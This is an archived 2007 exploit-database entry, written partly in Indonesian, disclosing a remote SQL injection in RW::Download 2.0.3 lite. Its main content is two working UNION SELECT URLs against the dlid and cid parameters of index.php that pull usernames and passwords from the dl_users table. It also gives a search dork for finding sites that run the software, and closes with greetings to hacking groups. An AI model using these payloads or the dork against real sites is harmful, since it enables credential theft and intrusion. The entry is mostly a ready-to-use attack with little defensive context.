RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln
# Published : 2007-09-07
# Author : k1tk4t
# Previous Title : Webace-Linkscript 1.3 SE (start.php) Remote SQL Injection Vulnerability
# Next Title : Online Fantasy Football League (OFFL) 0.2.6 RFI Vulnerabilities

########################################################################
# RW::Download v2.0.3 lite - Remote SQL Injection
# Vendor           : http://www.rwscripts.com/
# Ditemukan oleh   : k1tk4t - k1tk4t[4t]newhack.org
# Lokasi           : Indonesia  --  #newhack[dot]org @ irc.dal.net
# Dork             : "Powered by RW::Download v2.0.3 lite"
########################################################################

http://localhost/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*

http://localhost/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*

########################################################################
Terimakasih untuk;
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
Cintailah Bahasa Indonesia

# www.Syue.com [2007-09-07]